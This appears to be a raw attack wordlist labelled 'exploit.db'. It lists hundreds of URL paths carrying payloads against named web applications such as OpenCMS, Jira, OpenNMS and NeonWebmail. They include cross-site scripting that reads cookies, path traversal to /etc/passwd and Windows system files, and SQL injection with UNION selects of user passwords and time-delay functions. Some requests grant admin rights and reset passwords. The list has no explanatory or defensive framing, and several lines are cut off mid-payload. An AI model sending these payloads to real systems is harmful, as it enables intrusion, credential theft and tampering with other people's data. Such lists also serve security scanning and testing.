exploit.db

/CScgi/LogonProxy.cgi?Server=0.0.0.0&error=<script>alert("help")</script>
/CScgi/LogonProxy.cgi?Server=10.17.12.184/Logon?null&SSL=<script>alert('help')</script>
/CScgi/LogonProxy.cgi?Ok=<script>alert('help')</script>
////../../data/config/microsrv.cfg
////////../../../../../../etc/passwd 
/Page/1,10966,,00.html?var=<script>alert('s21sec')</script>
/vgn/login?errInfo="%2b%20document.cookie%20%2b" 
/vgn/login/1,501,,00.html?cookieName=x--\> 
/FormReflectingURLValue?OpenForm&Field=%5B%3Cscript%3E%2E%2E%2E%2E%2E%3C%2Fscript%3E%5D
/sitemindermonitor/doSave.jsp?file=../attacksample.jsp 
/url.jsp?foo=<script>alert('XSS vulnerability exists!')</script> 
/neonwebmail/downloadfile?filename=filename.ext&savefolder=[traversal]&savefilename=[traversal]
/Search.jsp?query=<script>alert('hi')</script>
/ViewIssue.jspa?id=[VALID_ID]&watch=true&returnUrl=data
/AttachFile!default.jspa?id=[VALID_ID]&returnUrl=javascript
/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap=subject&error=admincenter/login.jsp
/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=security&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&error=admincenter/login.jsp
/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=login&resourcetype=security&objectmap=subject&error=admincenter/login.jsp
/opennms/event/list?sortby=id&limit=10&filter=msgsub%3D%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E&filter=iplike%3D*.*.*.* 
/wlse/configure/archive/archiveApplyDisplay.jsp?displayMsg=<script>document.location='http
/netflow/jspui/selectDevice.jsp?rtype=g lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6 8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E %62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F% 6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2 F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65% 6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2 F%62%6F%64%79%3E 
/idm/user/main.jsp?activeControl=";</script><script>alert(&#039;Running_scripting_within_the_context_of_&#039;%2bdocument.domain)</script>
/wiki/NewGroup.jsp?group=[XSS]
/elasticpath_dir/manager/getImportFileRedirect.jsp?type=mapping&file=../../../../../boot.ini
/idm/login.jsp?lang=en&cntry=--><textarea>THIS+IS+MY+INJECTED+HTML&lt;/textarea&gt;<!--
/idm/login.jsp?lang=--><script>window.location="http
/ghboard/component/flashupload/download.jsp?name=[file_name]
/ghboard/component/flashupload/download.jsp?name=../config.js
/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14"><script>alert('XSS')</script>8b3283a1e57
/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a"><script>alert(1)</script>2aa99b60533&iaction=precreatefcb14"><script>alert(â??XSSâ??)</script>8b3283a1e57
/;www.example.com/jsp-examples/snp/snoop.jsp;[xss] 
/ghboard/component/flashupload/data/upload_filename.xxx 
/netflow/jspui/appConfig.jsp?task=Modif y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7 2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6 2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6 E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2 F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3 E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6 5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3 C%2F%62%6F%64%79%3E&appID=62
/pagesUTF8/auftrag_job.jsp?OSG05=1944&anchor=AJob31944 surf jobs
/examples/jsp/cal/cal2.jsp?time=8am%3cscript%3ealert("XSS!")%3c%2fscript%3e 
/pe/repository/displaynavigator.jsp?rootFolder=101
/pe/repository/include/renamepopup.jsp?selectedObject=101
/pe/repository/displaydeletenavigator.jsp?selectedObjectsCSV=101
/opencms/opencms/system/workplace/views/explorer/tree_files.jsp?resource=+*/+alert(document.cookie);+/*+/ 
/forum/bookmarks/insert/2/1.page?action=insertSave&description=<XSS>&module=bookmarks&relation_id=1&relation_type=2&title=<XSS>&visible=1
/sas5/index.jsp?error_msg_parameter=%3CScRiPt%3Ealert%28%27XSS%27%29%3C/ScRiPt%3E
/wiki/Login.jsp?tab=profile&loginname=[XSS]&password=Test&password2=Test&wikiname=[XSS]&fullname=[XSS]&email=[XSS]&ok=Save+profile&action=saveProfile
/search.jsp?q=%25%22%3Cscript%3Ealert(1)%3C/script%3E
/Aris/wflogin.jsp?errmsg=XSS msg<script>alert('Test XSS')</script>
/jira/secure/BrowseProject.jspa?id="><script>alert('XSS')</script>
/path/tc/contents/home001.jsp?contentid=[XSS] 
/webapps/portal/frameset.jsp?tab_id=[tabid]&url=[url] 
/elasticpath_dir/manager/fileManager.jsp?dir=../../../../WINDOWS/system32/config/
/neonwebmail/updateuser?in_id=admin&in_pass=hacked&in_name=admin&in_admin=1&
/neonwebmail/updateuser?in_id=guest&in_pass=guest&in_name=guest&in_admin=1&
/neonwebmail/updateuser?in_id=admin&exe=read
/neonwebmail/updateuser?in_id=super&in_pass=super&in_name=super&in_admin=1&
/wiki/Edit.jsp?page=Main&action=save&edittime=1186698299838&addr=127.0.0.1&_editedtext=[XSS]&changenote=[XSS]&ok=Save
/[search].jsp?[query]=><img src=javascript
/netflow/jspui/index.jsp?grID=-1&view= ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61% 20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F% 6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74% 6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31% 3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C% 2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63% 75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70% 74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos 
/netflow/jspui/index.jsp?grID=-1&view=g roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20% 68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E% 2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D% 6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E% 3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F% 70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75% 6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74% 3E%3C%2F%62%6F%64%79%3E&grDisp=1
/ReqWebHelp/basic/searchView.jsp?searchWord=>''><script>alert(306531)</script>&maxHits=>''><script>alert(306531)</script>&scopedSearch=>''><script>alert(306531)</script>&scope=>''><script>alert(306531)</script> 
/usermode/consoleConnect.jsp?consolename=console_name
/application/saveUser.do?userId=9&password=&userName=my_id&fullName=My+name&department=Security&location=Work&phone=555-1212&mobile=&pager=&email=test%40example.com&status=Enable&localPassword=true&adminUser=true&forward=&action=Save 
/opencms/system/workplace/admin/accounts/users_list.jsp?ispopup=&action=listsearch&framename=&title=&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Faction%253Dinitial%2526path%253D%252Faccounts%252Forgunit&preactiondone=&dialogtype=&message=&resource=&listaction=&base=&selitems=&formname=lsu-form&sortcol=&oufqn=&originalparams=&page=&style=new&root=&path=%252Faccounts%252Forgunit%252Fusers&redirect=&searchfilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E&listSearchFilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E 
/webapp/jsp/calendar.jsp?enc=iso-8859-1%0d%0aContent-length=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E
/netflow/jspui/applicationList.jsp?alph a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68 %72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E %62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F %6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C %2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70 %3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D %65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E %3C%2F%62%6F%64%79%3E 
/wps/wcm/webinterface/login/login.jsp?";><script>maliciou s_script</script><b%20"
/wps/wcm/webinterface/login/login.jsp?"; style="tr
/netflow/jspui/customReport.jsp?rtype=gl obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68% 72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62 %6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2 0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62% 72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73 %63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2 E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F% 64%79%3E&period=hourly&customOption=true&firstTime=true 
/examplesWebApp/InteractiveQuery.jsp?person=<script>alert('XSS')</script>
/opennms/j_acegi_security_check?j_username=test'><script>alert('hi');</script>&j_password=test 
/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="http
/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=Demo&resourceName=<script>alert("trouble_ahead")</script><script>alert(document.cookie)</script>&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1
/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%Demo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1 
/wsnavigator/jsps/explorer/help.jsp?title=Test">AAAAAAAA<script>alert(&#039;XSS&#039;)</script>
/swr.jsp?q=%25"<script>alert(1)</script>&swrnum=1 
/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb1
/revize/conf/revise.xml 
/idm/account/findForSelect.jsp?resultsForm=<script>alert(&#039;Running_scripting_within_the_context_of_&#039;%2bdocument.domain)</script>&predefinedQuery=name%3Astarts+with%3A%25
/user-properties.jsp?username=%3C[xss] 
/ReqWebHelp/advanced/workingSet.jsp?operation=add*/--&gt;&lt;/script&gt;&lt;script&gt;alert(289325)&lt;/script&gt;&amp;workingSet=
/ReqWebHelp/basic/searchView.jsp?searchWord=&gt;''&gt;&lt;script&gt;alert(306531)&lt;/script&gt;&amp;maxHits=&gt;''&gt;&lt;script&gt;alert(306531)&lt;/script&gt;&amp;scopedSearch=&gt;''&gt;&lt;script&gt;alert(306531)&lt;/script&gt;&amp;scope=&gt;''&gt;&lt;script&gt;alert(306531)&lt;/script&gt;
/[search].jsp?[query]=><img src=javascript
/ReqWebHelp/advanced/workingSet.jsp?operation=add*/--></script><script>alert(289325)</script>&workingSet=
/opennms/notification/list.jsp?username=%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E
/wiki/UserPreferences.jsp?tab=profile&loginname=[XSS]&password=test&password2=test&wikiname=[XSS]&fullname=[XSS]&email=[XSS]&ok=Save+profile&action=saveProfile
/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Fworkplace%2Flogfileview
/opencms/opencms/system/workplace/admin/workplace/logfileview/downloadTrigger.jsp?filePath=/etc/passwd
/opencms/opencms/system/workplace/editors/editor.jsp?resource=/index.jsp
/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Faccounts%2Fwebusers/new
/opencms/opencms/system/workplace/views/admin/admin-main.jsp? path=%2Fmodules%2Fmodules_import
/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Fdatabase%2Fimporthttp
/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Fworkplace%2Fbroadcast
/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Faccounts/users
/[agx_application]/pages/ucquerydetails.jsp?QueryID=>%22%27><img%20src%3d%22javascript
/ReadMessage.jsp?msgno=10001
/ReadMessage.jsp?msgno=10002 
/neonwebmail/updatemail?ID=1&getpost=get&folderid=-1&tofolderid=-9&status=1&execute=move
/neonwebmail/updatemail?ID=1&getpost=get&folderid=-9&tofolderid=100&status=1&execute=move
/login.jsp?url=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%22hi%22)%3C/script%3E 
/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14"><script>alert('XSS')</script>8b3283a1e57 
/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a"><script>alert(1)</script>2aa99b60533&iaction=precreatefcb14"><script>alert(â??XSSâ??)</script>8b3283a1e57
/%0a%0a<script>alert("jax%20is%20ereet%20
/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
/bugzero/jsp/query.jsp?msg=[XSS]
/neonwebmail/addrlist?PAGE=1&sysid=0&adr_sortkey=rand(benchmark(1000000000000, sha1('123456781234567812345678')))&adr_sortkey_desc= ID, SELECT * FROM T_ADDR_BOOK WHERE ID = 'username' ORDER BYrand(benchmark(1000000000000,sha1('123456781234567812345678'))),SYSID DESC
/;www.example.com/some_app.jsf?autoscroll=[javascript] 
/idm/help/index.jsp?helpUrl=http
/log.jsp?log=%3Cimg%20src=%27%27%20onerror=%27[xss] 
/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb1
/jspsnoop/ERROR/%3Cscript%3Ealert(123)%3C/script%3E
/jspsnoop/IOException/%3Cscript%3Ealert(123)%3C/script%3E
/jspsnoop/%3Cscript%3Ealert(123)%3C/script%3E
/wiki/Diff.jsp?page=Administrator&r1=[XSS]&r2=[XSS] 
/path/secure/IssueNavigator.jspa?mode=hide&requestId="><script>alert("xss");</script
/path/secure/IssueNavigator.jspa?mode=hide&requestId="><scriptsrc=http
/group-summary.jsp?search=%22%3E%3C[xss] 
/path/msg.jsp?msg=[XSS]
/log.jsp?log=..\..\..\windows\debug\netsetup 
/bugzero/jsp/edit.jsp?projectId=&entryId=[XSS]
/search.jsp?oe=english&q=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&qor= 
/revize/debug/query_results.jsp?webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects
/revize/debug/query_results.jsp?query=select%20*%20from%20pbpublic.rSubjects 
/neonwebmail/maillist?getpost=get&PAGE=1&folderid=-1&sysid=0&sortkey=SENDER, rand(benchmark(1000000000000,sha1('123456781234567812345678')))&sortkey_desc=&sendkind=&searchlist=
/[agx_application]/pages/ucschcancelproc.jsp?returnpage=http
/neonwebmail/updateuser?in_id=admin&in_pass=hacked&
/wiki/Comment.jsp?page=Main&action=save&edittime=1186698386737&addr=127.0.0.1&_editedtext=[XSS]&author=AnonymousCoward&link=&ok=Save
/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=/PRM&Pfad=/ORDER/
/owProductDetail.asp?idProduct='SQL_INJECTION
/owProductDetail.asp?sAction=ProductReview&idProduct='SQL_INJECTION&idCategory=40&sUserName=&sUserEmail=&sRating=1&sBody=dcrab 
/registration-form.html?ClickFrom=[xss] 
/admin/login.asp">
/login.asp">
/store/tellAFriend.asp?idProduct='"><script>alert(document.cookie)</script> 
/sa3.5.2.14/scripts/prodList.asp?brand='[sql]
/userslist.asp?page=2'&catid=16 
/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible
/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible
/store/Search.asp?SearchType=565[SQL-INJECTION]&strSearch=lalala
/store/Search.asp?InStock=&SearchType=783&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate='
/store/ViewItem.asp?ISBN=0789906651[SQL-INJECTION]&Cat0=565
/store/ViewItem.asp?ISBN=0789906651&Cat0=565[SQL-INJECTION]
/store/STWShowContent.asp?idRightPage=13032[SQL-INJECTION]
/store/MySide.Asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles
/store/BrowseMain.asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4 
/post3/view.asp?id=-99)+union+select+0,uid,password,3,4,5,6,7,8,9,10+from+user+where+1=(1
/UblogReload/blog_comment.asp?bi=71&m=6&y=2005'&d=&s=category
/Request-call-back.html?ClickFrom=[xss]
/Search_1.aspx?pojam=[XSS] 
/login.asp?ret_page=[XSS] 
/UserControls/Popups/frmHelp.aspx?url='%22--%3E%3Cscript%3Ealert(0x0003DC)%3C/script%3E 
/products.asp?partno=[sql]
/index.asp?Block=1&page=[SQL INJECTION]
/listmain.asp?cat='[sql]
/blog/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=[xss] 
/activeauctionsuperstore/account.asp?ReturnURL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/module/account/register/register.asp?FirstName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?LastName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?Username=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?Password=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?Address1=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?Address2=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?City=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?ZipCode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?Email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/multi/city.asp?probe=[Code]
/aspdotnetcart/admin/signin.aspx?returnurl=1"style=
/aspdotnetcart/admin/signin.aspx?returnurl=--><scri
/aspdotnetcart/admin/signin.aspx?returnurl=>"><scri
/aspdotnetcart/admin/signin.aspx?returnurl=>"'><img
/dispuser.asp?name=Walltrapass[XSS-CODE] 
/manager/backup.asp?bck=./../file.asp 
/error.asp?Message_id=35<script>alert(document.cookie)</script> 
/post3/Book.asp?review=<script>alert(/xss/)</script>
/admin/picture/picture_real_edit.asp?id='%20union%20select%20@@version%20,@@microsoftversion,@@version-- 
/aspdotnetcart/admin/deleteicon.aspx?ProductID=1&Fo
/ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--
/ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2-
/SearchResults.asp?SearchWord=[SQLCOMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0
/scart/admin/login.asp?AdminID=admin&AdminPWD='[SQL Injection]
/scart/admin/login.asp?AdminID=admin&AdminPWD=''='[SQL Injection] 
/cv.asp
/path/filelist.asp?parentid=0&show_id=[SQL INJECTION]
/path/filelist.asp?parentid=[sql injection]&show_id=1
/Labels.asp?&Term=SQL
/searchdb.asp?q=[CODE]&mode=AND&Submit=Search 
/admin/inc_edit.asp?iEve=1
/admin/inc_events.asp
/admin/inc_type.asp
/admin/inc_cats.asp
/admin/inc_users.asp
/admin/inc_user_edit.asp?id=admin
/admin/inc_links.asp
/admin/inc_edit.asp?iLink=10
/admin/inc_type.asp
/admin/inc_files.asp
/admin/inc_edit.asp?iFile=50
/admin/inc_type.asp
/admin/inc_pictures.asp
/admin/inc_edit.asp?iPic=100
/admin/inc_type.asp
/admin/inc_add.asp
/admin/inc_pics.asp
/admin/inc_edit.asp?iPic=500
/admin/inc_type.asp
/admin/inc_channel_listing.asp
/admin/inc_channel_edit.asp?iChannel=5
/admin/inc_config.asp
/admin/inc_users.asp
/admin/inc_users_edit.asp?iUser=admin
/activeauctionsuperstore/?ReturnURL=start.asp&username=dcrab&password='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/activeauctionsuperstore/?ReturnURL=start.asp&username='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&password=
/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&LoginType=1&DIRECTTO=3&PARAMS=XXX"><script>function 
/stealer/?userid=" + 
/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&LoginType=1&PARAMS=XXX"><SCRIPT>PAYLOAD 
/acartpath/signin.asp?msg=<script>alert('Zone-h')</script> 
/search.asp?searchtxt=[XSS] 
/path/admin/main.asp?date=[CSS]
/products/detail.asp?iPro=&#039;
/comersus/backofficePlus/comersus_backoffice_supportError.asp?error=<script>alert('vul');</script>
/csm/asp/listings.asp?s=%3C%2Ftextarea%3E%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
/bp/myFiles.asp 
/forum/search/SearchResults.aspx?q=><script>alert('CSS%20Vulnerable')</script><
/csm/asp/detail.asp?l=&p='[sql]
/dc_Categoriesview.asp??key='&RecPerPage=5
/demo/dc_productslist_Clearance.asp?cmd=%27
/demo/ratings.asp??PID='
/demo/dc_forum_Postslist.asp?start='
/demo/dc_forum_Postslist.asp?key_m='
/demo/dc_forum_Postslist.asp?psearch=1&Submit=Search%20%28%2A%29&psearchtype='
/demo/dc_forum_Postslist.asp?psearch='&Submit=Search%20%28%2A%29&psearchtype=1 
/path/diziler.asp?id=[Sql Injection] 
/urunler.asp?catno=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from users 
/path_to_comersus/comersus_customerLoggedVerify.asp?
/homeDetail.asp?AD_ID='[sql]
/DUamazonPro/admin/catDelete.asp?iCat=13[SQL Inject]
/DUforum/messageDetail.asp?MSG_ID=1;[SQL INJECT]
/login.asp?SessionID=[XSS]
/blog/\n";
/eshopv-8/product.asp?intProdID='SQL_INJECTION&amp%3bstrCatalog_NAME=&amp%3bstrSubCatalog_NAME=&amp%3bstrSubCatalogID=&amp%3bintCatalogID=10001&amp%3bCurCatalogID=
/mcart2pfp/product.asp?intProdID='SQL_INJECTION
/mcart2sqluk/product.asp?intProdID='SQL_INJECTION
/mcart2pal/product.asp?intProdID='SQL_INJECTION 
/haber_oku.asp?id=9%20union+select+0,sifre,kulladi,3,4,5,6+from+uyeler 
/detay.asp?Emlak=[SQL] 
/resulttype.asp?probe=[Code] 
/welcome.asp?id=[SQL]
/welcome.asp?page=search.asp&search=[SQL]
/welcome.asp?page=content_display.asp&id=[SQL]
/welcome.asp?page=customer_list.asp&ctype=[SQL]
/welcome.asp?page=calendar_add.asp&id=[SQL]
/welcome.asp?action=invitation&calendarid=[SQL]&ans=1
/welcome.asp?page=employee_detail.asp&lid=&id=[SQL]
/welcome.asp?page=customer_list.asp&ctype=[SQL]
/welcome.asp?page=front_calendar_display.asp&ctype=[SQL]
/welcome.asp?page=calendar_display.asp&id=[SQL]
/welcome.asp?page=front_content_display.asp&ctype=[SQL]
/welcome.asp?page=message_send.asp&id=[SQL]
/welcome.asp?action=delmessage&id=[SQL]
/welcome.asp?page=message.asp&id=[SQL]
/welcome.asp?page=content_search.asp&search=[SQL]
/welcome.asp?page=content_display.asp&id=[SQL]&category=[SQL]
/welcome.asp?page=category_display.asp&category=[SQL]
/welcome.asp?page=contact_form.asp&id=[SQL]
/welcome.asp?id=30&ctype=1&lid=f30&page=folder_detail.asp
/welcome.asp?page=message.asp&id=4
/welcome.asp?action=delmessage&id=3
/fileupload.asp" enctype="multipart/form-data" id="form1" name="form1">
/DUforum/post.asp?iFor=6[SQL Inject] 
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&sort=headline&#039;INJECTED_PAYLOAD&rmore=-&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&#039;INJECTED_PAYLOAD&sort=headline&rmore=-&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&#039;INJECTED_PAYLOAD&ord=asc&sort=headline&rmore=-&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15&#039;INJECTED_PAYLOAD&ss=y&size=1.1em&target=iframe&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc&sort=headline&#039;INJECTED_PAYLOAD&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc&#039;INJECTED_PAYLOAD&sort=headline&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&#039;INJECTED_PAYLOAD&ord=asc&sort=headline&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&#039;INJECTED_PAYLOAD&pz=21&ord=asc&sort=headline&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&sort=posted&#039;INJECTED_PAYLOAD&featured=n&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&#039;INJECTED_PAYLOAD&sort=posted&featured=n&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=8&#039;INJECTED_PAYLOAD&featured=only&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc&sort=posted&#039;INJECTED_PAYLOAD&rmore=-&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc&#039;INJECTED_PAYLOAD&sort=posted&rmore=-&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&#039;INJECTED_PAYLOAD&featured=n&ord=desc&sort=posted&rmore=-&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&#039;INJECTED_PAYLOAD&ord=desc&sort=posted&featured=n&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&#039;INJECTED_PAYLOAD&pz=8&featured=only&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&#039;INJECTED_PAYLOAD&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&sort=posted&#039;INJECTED_PAYLOAD&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&#039;INJECTED_PAYLOAD&sort=posted&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&#039;INJECTED_PAYLOAD&ord=desc&sort=posted&
/dUpro/Businesses/../Pictures/detail.asp?iData=53&iCat=510&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/Businesses/../Pictures/detail.asp?iData=53&iCat=510&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/Businesses/../Pictures/detail.asp?iData=53&iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/Businesses/../Pictures/detail.asp?iData=&#039;SQL_INJECTION&iCat=510&iChannel=3&nChannel=Pictures
/dUpro/Businesses/detail.asp?iData=1&iCat=563&iChannel=18&nChannel=&#039;SQL_INJECTION
/dUpro/Businesses/detail.asp?iData=1&iCat=563&iChannel=&#039;SQL_INJECTION&nChannel=Businesses
/dUpro/Businesses/detail.asp?iData=&#039;SQL_INJECTION&iCat=563&iChannel=18&nChannel=Businesses
/dUpro/Classifieds/../Pictures/detail.asp?iData=3&iCat=520&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/Classifieds/../Pictures/detail.asp?iData=3&iCat=520&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
